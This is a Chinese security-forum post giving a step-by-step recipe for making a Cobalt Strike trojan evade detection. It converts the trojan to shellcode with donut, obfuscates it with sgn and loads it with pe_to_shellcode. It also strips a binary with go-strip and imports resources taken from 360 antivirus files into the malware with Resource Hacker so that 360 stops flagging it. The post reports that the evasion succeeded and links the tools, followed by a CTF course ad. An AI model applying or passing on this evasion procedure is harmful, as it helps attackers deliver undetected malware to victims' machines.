-
-
[原创]免杀基础之给病毒加上可信资源过360杀软
-
2023-9-18 16:45
-
cs生成的木马混淆后上线
第一步,使用donut.exe生成.bin文件
donut.exe -i calc.exe -a 2(x64是2,x86是1) 把exe转换成.bin(测试时将calc.exe替换成木马)
第二步,使用工具sgn对bin文件进行混淆
sgn.exe -a 64(64位系统) -c 5(等待时间为5) shellcode.bin
第三步,使用pe2she_1.2将混淆后的.bin文件上线shellcode
上线成功:
使用到的工具下载地址:
https://github.com/TheWover/donut
https://github.com/hasherezade/pe_to_shellcode/releases/tag/v1.2
免杀练习:给一个病毒加上可信资源过360
使用到的工具:https://github.com/boy-hack/go-strip
go-strip -f binary.exe -a -output new.exe
new.exe即是混淆后的二进制文件
开始之前先用360扫一下该病毒,报毒:
使用Resource Hacker将任意一个360的资源保存下来
项目下载地址:http://www.angusj.com/resourcehacker/
将保存下来的资源导入到病毒中
成功过杀软
[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界
最后于 2023-9-19 19:02
被大河向东流哇编辑
,原因:
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
